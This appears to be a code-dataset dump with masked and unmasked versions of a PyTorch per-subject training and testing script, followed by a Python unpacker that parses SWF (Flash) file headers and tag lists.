loss_train, acc_train, f1_train))\n loss_val, pred_val, act_val = predict(data_loader=val_loader, net=\n model, loss_fn=loss_fn)\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.format(\n epoch, loss_val, acc_val, f1_val))\n if acc_val > trlog['max_acc']:\n trlog['max_acc'] = acc_val\n save_model('max-acc')\n if args.save_model:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(\n fold) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.\n data_format, args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce\n )\n torch.save(model.state_dict(), model_name_reproduce)\n trlog['train_loss'].append(loss_train)\n trlog['train_acc'].append(acc_train)\n trlog['val_loss'].append(loss_val)\n trlog['val_acc'].append(acc_val)\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.\n measure(epoch / args.max_epoch), subject, fold))\n save_name_ = 'trlog' + save_name\n ensure_path(osp.join(args.save_path, 'log_train'))\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\n return trlog['max_acc']\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, 
net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-3": "<mask token>\nCUDA = torch.cuda.is_available()\n\n\ndef train_one_epoch(data_loader, net, loss_fn, optimizer):\n net.train()\n tl = Averager()\n pred_train = []\n act_train = []\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n tl.add(loss)\n pred_train.extend(pred.data.tolist())\n act_train.extend(y_batch.data.tolist())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return tl.item(), pred_train, act_train\n\n\ndef predict(data_loader, net, loss_fn):\n net.eval()\n pred_val = []\n act_val = []\n vl = Averager()\n with torch.no_grad():\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n vl.add(loss.item())\n pred_val.extend(pred.data.tolist())\n act_val.extend(y_batch.data.tolist())\n return vl.item(), pred_val, act_val\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\n seed_all(args.random_seed)\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\n set_up(args)\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\n model = get_model(args)\n para = get_trainable_parameter_num(model)\n print('Model {} size:{}'.format(args.model, para))\n if CUDA:\n model = model.cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n\n def save_model(name):\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\n if os.path.exists(previous_model):\n os.remove(previous_model)\n torch.save(model.state_dict(), 
osp.join(args.save_path, '{}.pth'.\n format(name)))\n trlog = {}\n trlog['args'] = vars(args)\n trlog['train_loss'] = []\n trlog['val_loss'] = []\n trlog['train_acc'] = []\n trlog['val_acc'] = []\n trlog['max_acc'] = 0.0\n timer = Timer()\n for epoch in range(1, args.max_epoch + 1):\n loss_train, pred_train, act_train = train_one_epoch(data_loader=\n train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=\n act_train)\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'.format(epoch,\n loss_train, acc_train, f1_train))\n loss_val, pred_val, act_val = predict(data_loader=val_loader, net=\n model, loss_fn=loss_fn)\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.format(\n epoch, loss_val, acc_val, f1_val))\n if acc_val > trlog['max_acc']:\n trlog['max_acc'] = acc_val\n save_model('max-acc')\n if args.save_model:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(\n fold) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.\n data_format, args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce\n )\n torch.save(model.state_dict(), model_name_reproduce)\n trlog['train_loss'].append(loss_train)\n trlog['train_acc'].append(acc_train)\n trlog['val_loss'].append(loss_val)\n trlog['val_acc'].append(acc_val)\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.\n measure(epoch / args.max_epoch), subject, fold))\n save_name_ = 'trlog' + save_name\n ensure_path(osp.join(args.save_path, 'log_train'))\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\n return trlog['max_acc']\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if 
CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-4": "from utils import *\nimport copy\nimport torch.nn as nn\nCUDA = torch.cuda.is_available()\n\n\ndef train_one_epoch(data_loader, net, loss_fn, optimizer):\n net.train()\n tl = Averager()\n pred_train = []\n act_train = []\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n tl.add(loss)\n pred_train.extend(pred.data.tolist())\n act_train.extend(y_batch.data.tolist())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return tl.item(), pred_train, act_train\n\n\ndef predict(data_loader, net, loss_fn):\n net.eval()\n pred_val = []\n act_val = []\n vl = Averager()\n with torch.no_grad():\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n vl.add(loss.item())\n pred_val.extend(pred.data.tolist())\n act_val.extend(y_batch.data.tolist())\n return vl.item(), pred_val, act_val\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\n seed_all(args.random_seed)\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\n set_up(args)\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\n model = get_model(args)\n para = get_trainable_parameter_num(model)\n print('Model {} size:{}'.format(args.model, para))\n if CUDA:\n model = model.cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n\n def save_model(name):\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\n if os.path.exists(previous_model):\n 
os.remove(previous_model)\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.\n format(name)))\n trlog = {}\n trlog['args'] = vars(args)\n trlog['train_loss'] = []\n trlog['val_loss'] = []\n trlog['train_acc'] = []\n trlog['val_acc'] = []\n trlog['max_acc'] = 0.0\n timer = Timer()\n for epoch in range(1, args.max_epoch + 1):\n loss_train, pred_train, act_train = train_one_epoch(data_loader=\n train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=\n act_train)\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'.format(epoch,\n loss_train, acc_train, f1_train))\n loss_val, pred_val, act_val = predict(data_loader=val_loader, net=\n model, loss_fn=loss_fn)\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.format(\n epoch, loss_val, acc_val, f1_val))\n if acc_val > trlog['max_acc']:\n trlog['max_acc'] = acc_val\n save_model('max-acc')\n if args.save_model:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(\n fold) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.\n data_format, args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce\n )\n torch.save(model.state_dict(), model_name_reproduce)\n trlog['train_loss'].append(loss_train)\n trlog['train_acc'].append(acc_train)\n trlog['val_loss'].append(loss_val)\n trlog['val_acc'].append(acc_val)\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.\n measure(epoch / args.max_epoch), subject, fold))\n save_name_ = 'trlog' + save_name\n ensure_path(osp.join(args.save_path, 'log_train'))\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\n return trlog['max_acc']\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, 
label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-5": "\r\nfrom utils import *\r\nimport copy\r\nimport torch.nn as nn\r\n\r\nCUDA = torch.cuda.is_available()\r\n\r\n\r\ndef train_one_epoch(data_loader, net, loss_fn, optimizer):\r\n net.train()\r\n tl = Averager()\r\n pred_train = []\r\n act_train = []\r\n for i, (x_batch, y_batch) in enumerate(data_loader):\r\n if CUDA:\r\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\r\n\r\n out = net(x_batch)\r\n loss = loss_fn(out, y_batch)\r\n _, pred = torch.max(out, 1)\r\n tl.add(loss)\r\n pred_train.extend(pred.data.tolist())\r\n act_train.extend(y_batch.data.tolist())\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n return tl.item(), pred_train, act_train\r\n\r\n\r\ndef predict(data_loader, net, loss_fn):\r\n net.eval()\r\n pred_val = []\r\n act_val = []\r\n vl = Averager()\r\n with torch.no_grad():\r\n for i, (x_batch, y_batch) in enumerate(data_loader):\r\n if CUDA:\r\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\r\n\r\n out = net(x_batch)\r\n loss = loss_fn(out, y_batch)\r\n _, pred = torch.max(out, 1)\r\n vl.add(loss.item())\r\n pred_val.extend(pred.data.tolist())\r\n act_val.extend(y_batch.data.tolist())\r\n return vl.item(), pred_val, act_val\r\n\r\n\r\ndef set_up(args):\r\n set_gpu(args.gpu)\r\n ensure_path(args.save_path)\r\n torch.manual_seed(args.random_seed)\r\n torch.backends.cudnn.deterministic = True\r\n\r\n\r\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\r\n seed_all(args.random_seed)\r\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\r\n set_up(args)\r\n\r\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\r\n\r\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\r\n\r\n model = get_model(args)\r\n para = get_trainable_parameter_num(model)\r\n print('Model {} size:{}'.format(args.model, para))\r\n\r\n if CUDA:\r\n model = model.cuda()\r\n\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\r\n loss_fn = 
nn.CrossEntropyLoss()\r\n\r\n def save_model(name):\r\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\r\n if os.path.exists(previous_model):\r\n os.remove(previous_model)\r\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.format(name)))\r\n\r\n trlog = {}\r\n trlog['args'] = vars(args)\r\n trlog['train_loss'] = []\r\n trlog['val_loss'] = []\r\n trlog['train_acc'] = []\r\n trlog['val_acc'] = []\r\n trlog['max_acc'] = 0.0\r\n\r\n timer = Timer()\r\n\r\n for epoch in range(1, args.max_epoch + 1):\r\n\r\n loss_train, pred_train, act_train = train_one_epoch(\r\n data_loader=train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\r\n\r\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=act_train)\r\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'\r\n .format(epoch, loss_train, acc_train, f1_train))\r\n\r\n loss_val, pred_val, act_val = predict(\r\n data_loader=val_loader, net=model, loss_fn=loss_fn\r\n )\r\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\r\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.\r\n format(epoch, loss_val, acc_val, f1_val))\r\n\r\n\r\n if acc_val > trlog['max_acc']:\r\n trlog['max_acc'] = acc_val\r\n save_model('max-acc')\r\n\r\n if args.save_model:\r\n # save model here for reproduce\r\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'\r\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)\r\n save_path = osp.join(args.save_path, data_type)\r\n ensure_path(save_path)\r\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\r\n torch.save(model.state_dict(), model_name_reproduce)\r\n\r\n trlog['train_loss'].append(loss_train)\r\n trlog['train_acc'].append(acc_train)\r\n trlog['val_loss'].append(loss_val)\r\n trlog['val_acc'].append(acc_val)\r\n\r\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.measure(epoch / args.max_epoch),\r\n subject, fold))\r\n save_name_ = 
'trlog' + save_name\r\n ensure_path(osp.join(args.save_path, 'log_train'))\r\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\r\n\r\n return trlog['max_acc']\r\n\r\n\r\ndef test(args, data, label, reproduce, subject, fold):\r\n seed_all(args.random_seed)\r\n set_up(args)\r\n\r\n test_loader = get_dataloader(data, label, args.batch_size, False)\r\n\r\n model = get_model(args)\r\n if CUDA:\r\n model = model.cuda()\r\n loss_fn = nn.CrossEntropyLoss()\r\n\r\n if reproduce:\r\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'\r\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)\r\n save_path = osp.join(args.save_path, data_type)\r\n ensure_path(save_path)\r\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\r\n model.load_state_dict(torch.load(model_name_reproduce))\r\n else:\r\n model.load_state_dict(torch.load(args.load_path))\r\n loss, pred, act = predict(\r\n data_loader=test_loader, net=model, loss_fn=loss_fn\r\n )\r\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\r\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\r\n return acc, pred, act\r\n\r\n\r\n",
"step-ids": [
2,
4,
6,
7,
8
]
}
|
[
2,
4,
6,
7,
8
] |
#!/usr/bin/env python3
import sys
import os
import math
import tempfile
import zlib
import lzma
import struct
import bitstruct
# a swf file unpacker and analyzer
# majority of information taken from https://www.adobe.com/devnet/swf.html (version 19)
# some additional information taken from https://github.com/claus/as3swf/wiki/SWF-tag-support-chart
class SWFFileUnpackingException(Exception):
    '''Generic exception raised while unpacking a swf file, typically due to incorrect structure or unexpected values.'''
class SWFRect(object):
    """Simple value object holding the four extents of a swf RECT record."""

    def __init__(self, xmin, xmax, ymin, ymax):
        # Store all four extents in one unpacking assignment.
        self.xmin, self.xmax, self.ymin, self.ymax = xmin, xmax, ymin, ymax

    def __str__(self):
        return f'SWFRect({self.xmin!s},{self.xmax!s},{self.ymin!s},{self.ymax!s})'
# Maps swf tag type codes to human-readable tag names.
# Majority of entries come from the SWF v19 specification; the two entries
# marked inline were taken from the as3swf tag-support chart.
tagCodeTranslation = {
    0:'End',
    1:'ShowFrame',
    2:'DefineShape',
    4:'PlaceObject',
    5:'RemoveObject',
    6:'DefineBits',
    7:'DefineButton',
    8:'JPEGTables',
    9:'SetBackgroundColor',
    10:'DefineFont',
    11:'DefineText',
    12:'DoAction',
    13:'DefineFontInfo',
    14:'DefineSound',
    15:'StartSound',
    17:'DefineButtonSound',
    18:'SoundStreamHead',
    19:'SoundStreamBlock',
    20:'DefineBitsLossless',
    21:'DefineBitsJPEG2',
    22:'DefineShape2',
    23:'DefineButtonCxform',
    24:'Protect',
    26:'PlaceObject2',
    28:'RemoveObject2',
    32:'DefineShape3',
    33:'DefineText2',
    34:'DefineButton2',
    35:'DefineBitsJPEG3',
    36:'DefineBitsLossless2',
    37:'DefineEditText',
    39:'DefineSprite',
    41:'ProductInfo',  # taken from https://github.com/claus/as3swf/wiki/SWF-tag-support-chart
    43:'FrameLabel',
    45:'SoundStreamHead2',
    46:'DefineMorphShape',
    48:'DefineFont2',
    56:'ExportAssets',
    57:'ImportAssets',
    58:'EnableDebugger',
    59:'DoInitAction',
    60:'DefineVideoStream',
    61:'VideoFrame',
    62:'DefineFontInfo2',
    63:'DebugID',  # taken from https://github.com/claus/as3swf/wiki/SWF-tag-support-chart
    64:'EnableDebugger2',
    65:'ScriptLimits',
    66:'SetTabIndex',
    69:'FileAttributes',
    70:'PlaceObject3',
    71:'ImportAssets2',
    73:'DefineFontAlignZones',
    74:'CSMTextSettings',
    75:'DefineFont3',
    76:'SymbolClass',
    77:'Metadata',
    78:'DefineScalingGrid',
    82:'DoABC',
    83:'DefineShape4',
    84:'DefineMorphShape2',
    86:'DefineSceneAndFrameLabelData',
    87:'DefineBinaryData',
    88:'DefineFontName',
    89:'StartSound2',
    90:'DefineBitsJPEG4',
    91:'DefineFont4',
    93:'EnableTelemetry',
}
class SWFTag(object):
    """One swf tag header: numeric type code plus payload length in bytes."""

    def __init__(self, code, length):
        self.code = code
        self.length = length
        # Resolve the human-readable name; unknown codes get a loud sentinel
        # so undocumented tags stand out in the dumped output.
        self.typeName = tagCodeTranslation.get(code, '!UNKNOWN!')
        if self.typeName == '!UNKNOWN!':
            print('warning: unknown swf tag code: ' + str(code))

    def isEndTag(self):
        """Return True when this is the 'End' marker terminating a tag stream."""
        return self.typeName == 'End'

    def __str__(self):
        return f'SWFTag(code={self.code!s} "{self.typeName}", length={self.length!s})'
class SWFFile(object):
    """Unpacks a swf file: fixed header, optional decompression, and the tag stream.

    Loading happens eagerly in the constructor; afterwards the header fields
    and the `tags` list are populated and progress has been printed to stdout.
    """

    def __init__(self, filepath):
        self.filepath = filepath
        # Header fields, all filled in by load().
        self.compression = None  # 'none', 'zlib' or 'lzma', derived from the signature
        self.version = None
        self.fileLength = None
        self.frameSize = None  # SWFRect parsed from the (possibly compressed) header
        self.frameRate = None
        self.frameCount = None
        self.tags = []  # SWFTag instances in file order
        self.chunkSize = 16 * 4096  # read granularity used while streaming decompression
        self.load()

    def load(self):
        '''loads the swf file at the filepath'''
        self.handle = open(self.filepath, 'rb')
        # The first 8 bytes are never compressed and identify the compression scheme.
        self.unpackHeader1()
        print('signature:', self.signature)
        print('version:', self.version)
        print('fileLength:', self.fileLength)
        # Everything after those 8 bytes may be compressed; swap the handle for
        # a fully decompressed temp file before reading any further.
        if self.compression != 'none':
            self.decompress()
        self.unpackHeader2()
        print('frameSize:', self.frameSize)
        print('frameRate:', self.frameRate)
        print('frameCount:', self.frameCount)
        self.unpackTags()
        for tag in self.tags:
            print(tag)
            if tag.typeName == '!UNKNOWN!':
                print('warning: unknown tag!')

    def decompress(self):
        '''replaces the handle with a tempfile handle with all content decompressed'''
        temp = tempfile.TemporaryFile('w+b')
        if self.compression == 'zlib':
            decompressor = zlib.decompressobj()
        elif self.compression == 'lzma':
            decompressor = lzma.LZMADecompressor()
        else:
            raise Exception("unknown compression algorithm: "+self.compression)
        # Stream in chunks so large files never need to fit in memory at once.
        chunk = self.handle.read(self.chunkSize)
        while len(chunk) > 0:
            temp.write(decompressor.decompress(chunk))
            chunk = self.handle.read(self.chunkSize)
        temp.seek(0)  # rewind so subsequent reads start at the decompressed data
        self.handle = temp

    def unpackHeader1(self):
        '''unpacks the first 8 bytes of the header and figures out what compression there is'''
        header = self.handle.read(8)
        signature, self.version, self.fileLength = struct.unpack('<3sBI', header)
        signature = signature.decode('ascii')
        # First signature byte encodes the compression of the remainder of the
        # file: F = uncompressed, C = zlib, Z = lzma.
        if signature == 'FWS':
            self.compression = 'none'
        elif signature == 'CWS':
            self.compression = 'zlib'
        elif signature == 'ZWS':
            self.compression = 'lzma'
        else:
            raise SWFFileUnpackingException('unknown file signature: "'+signature+'"')
        self.signature = signature

    def unpackHeader2(self):
        '''unpacks the rest of the header data that might have been compressed'''
        self.frameSize = self.unpackRect()
        self.frameRate, self.frameCount = struct.unpack('<HH', self.handle.read(4))
        # NOTE(review): frameRate is an 8.8 fixed-point value per the spec, but
        # '<HH' reads it as a plain uint16, so the stored value is 256x the real
        # frame rate -- TODO: split into fraction/integer bytes and divide.

    def unpackRect(self):
        """Unpacks a RECT record: a 5-bit size field followed by four signed size-bit values."""
        data = self.handle.read(1)
        size, = bitstruct.unpack('u5', data)
        # The record is 5 + 4*size bits total; 8 bits were already read, so
        # ceil((4*size - 3) / 8) more bytes complete it.
        data += self.handle.read(math.ceil((size * 4 - 3) / 8))
        xmin, xmax, ymin, ymax = bitstruct.unpack('p5'+('s'+str(size))*4, data)
        return SWFRect(xmin, xmax, ymin, ymax)

    def unpackTags(self):
        """Reads tag headers until EOF, warning if any tag follows an 'End' tag."""
        sample = self.handle.read(2)  # peek: a tag header is at least 2 bytes
        tag = None
        while len(sample) > 0:
            if tag is not None and tag.isEndTag():
                print('warning: swf has tags after an end tag!')
            self.handle.seek(-2, os.SEEK_CUR)  # un-read the peeked bytes
            tag = self.unpackTag()
            self.tags.append(tag)
            sample = self.handle.read(2)

    def unpackTag(self):
        """Unpacks one tag header and skips its payload (payload bytes are discarded)."""
        tag = self.unpackTagHeader()
        self.handle.read(tag.length)  # skip the tag body; only headers are kept
        return tag

    def unpackTagHeader(self):
        """Unpacks a tag header: upper 10 bits = code, lower 6 = length (0x3f means a uint32 length follows)."""
        data, = struct.unpack('<H', self.handle.read(2))
        tagCode = data >> 6
        tagLength = data & 0x3f
        if tagLength == 0x3f:
            # Long form: the real length is stored in the next 4 bytes.
            tagLength, = struct.unpack('<I', self.handle.read(4))
        return SWFTag(tagCode, tagLength)
def main():
    """CLI entry point: unpack and dump the swf file named on the command line."""
    if len(sys.argv) < 2:
        print('filepath required')
        return
    SWFFile(sys.argv[1])


if __name__ == '__main__':
    main()
|
normal
|
{
"blob_id": "4556febd5fddf390f370a8e24871eacf08d34c9f",
"index": 7087,
"step-1": "<mask token>\n\n\nclass SWFRect(object):\n\n def __init__(self, xmin, xmax, ymin, ymax):\n self.xmin = xmin\n self.xmax = xmax\n self.ymin = ymin\n self.ymax = ymax\n\n def __str__(self):\n return 'SWFRect(' + str(self.xmin) + ',' + str(self.xmax) + ',' + str(\n self.ymin) + ',' + str(self.ymax) + ')'\n\n\n<mask token>\n\n\nclass SWFTag(object):\n\n def __init__(self, code, length):\n self.code = code\n self.length = length\n self.typeName = tagCodeTranslation.get(self.code, '!UNKNOWN!')\n if self.typeName == '!UNKNOWN!':\n print('warning: unknown swf tag code: ' + str(self.code))\n\n def isEndTag(self):\n return self.typeName == 'End'\n\n def __str__(self):\n return 'SWFTag(code=' + str(self.code\n ) + ' \"' + self.typeName + '\", length=' + str(self.length) + ')'\n\n\nclass SWFFile(object):\n\n def __init__(self, filepath):\n self.filepath = filepath\n self.compression = None\n self.version = None\n self.fileLength = None\n self.frameSize = None\n self.frameRate = None\n self.frameCount = None\n self.tags = []\n self.chunkSize = 16 * 4096\n self.load()\n\n def load(self):\n \"\"\"loads the swf file at the filepath\"\"\"\n self.handle = open(self.filepath, 'rb')\n self.unpackHeader1()\n print('signature:', self.signature)\n print('version:', self.version)\n print('fileLength:', self.fileLength)\n if self.compression != 'none':\n self.decompress()\n self.unpackHeader2()\n print('frameSize:', self.frameSize)\n print('frameRate:', self.frameRate)\n print('frameCount:', self.frameCount)\n self.unpackTags()\n for tag in self.tags:\n print(tag)\n if tag.typeName == '!UNKNOWN!':\n print('warning: unknown tag!')\n\n def decompress(self):\n \"\"\"replaces the handle with a tempfile handle with all content decompressed\"\"\"\n temp = tempfile.TemporaryFile('w+b')\n if self.compression == 'zlib':\n decompressor = zlib.decompressobj()\n elif self.compression == 'lzma':\n decompressor = lzma.LZMADecompressor()\n else:\n raise Exception('unknown compression 
algorithm: ' + self.\n compression)\n chunk = self.handle.read(self.chunkSize)\n while len(chunk) > 0:\n temp.write(decompressor.decompress(chunk))\n chunk = self.handle.read(self.chunkSize)\n temp.seek(0)\n self.handle = temp\n\n def unpackHeader1(self):\n \"\"\"unpacks the first 8 bytes of the header and figures out what compression there is\"\"\"\n header = self.handle.read(8)\n signature, self.version, self.fileLength = struct.unpack('<3sBI',\n header)\n signature = signature.decode('ascii')\n if signature == 'FWS':\n self.compression = 'none'\n elif signature == 'CWS':\n self.compression = 'zlib'\n elif signature == 'ZWS':\n self.compression = 'lzma'\n else:\n raise SWFFileUnpackingException('unknown file signature: \"' +\n signature + '\"')\n self.signature = signature\n\n def unpackHeader2(self):\n \"\"\"unpacks the rest of the header data that might have been compressed\"\"\"\n self.frameSize = self.unpackRect()\n self.frameRate, self.frameCount = struct.unpack('<HH', self.handle.\n read(4))\n\n def unpackRect(self):\n data = self.handle.read(1)\n size, = bitstruct.unpack('u5', data)\n data += self.handle.read(math.ceil((size * 4 - 3) / 8))\n xmin, xmax, ymin, ymax = bitstruct.unpack('p5' + ('s' + str(size)) *\n 4, data)\n return SWFRect(xmin, xmax, ymin, ymax)\n\n def unpackTags(self):\n sample = self.handle.read(2)\n tag = None\n while len(sample) > 0:\n if tag is not None and tag.isEndTag():\n print('warning: swf has tags after an end tag!')\n self.handle.seek(-2, os.SEEK_CUR)\n tag = self.unpackTag()\n self.tags.append(tag)\n sample = self.handle.read(2)\n\n def unpackTag(self):\n tag = self.unpackTagHeader()\n self.handle.read(tag.length)\n return tag\n\n def unpackTagHeader(self):\n data, = struct.unpack('<H', self.handle.read(2))\n tagCode = data >> 6\n tagLength = data & 63\n if tagLength == 63:\n tagLength, = struct.unpack('<I', self.handle.read(4))\n return SWFTag(tagCode, tagLength)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SWFFileUnpackingException(Exception):\n <mask token>\n\n\nclass SWFRect(object):\n\n def __init__(self, xmin, xmax, ymin, ymax):\n self.xmin = xmin\n self.xmax = xmax\n self.ymin = ymin\n self.ymax = ymax\n\n def __str__(self):\n return 'SWFRect(' + str(self.xmin) + ',' + str(self.xmax) + ',' + str(\n self.ymin) + ',' + str(self.ymax) + ')'\n\n\n<mask token>\n\n\nclass SWFTag(object):\n\n def __init__(self, code, length):\n self.code = code\n self.length = length\n self.typeName = tagCodeTranslation.get(self.code, '!UNKNOWN!')\n if self.typeName == '!UNKNOWN!':\n print('warning: unknown swf tag code: ' + str(self.code))\n\n def isEndTag(self):\n return self.typeName == 'End'\n\n def __str__(self):\n return 'SWFTag(code=' + str(self.code\n ) + ' \"' + self.typeName + '\", length=' + str(self.length) + ')'\n\n\nclass SWFFile(object):\n\n def __init__(self, filepath):\n self.filepath = filepath\n self.compression = None\n self.version = None\n self.fileLength = None\n self.frameSize = None\n self.frameRate = None\n self.frameCount = None\n self.tags = []\n self.chunkSize = 16 * 4096\n self.load()\n\n def load(self):\n \"\"\"loads the swf file at the filepath\"\"\"\n self.handle = open(self.filepath, 'rb')\n self.unpackHeader1()\n 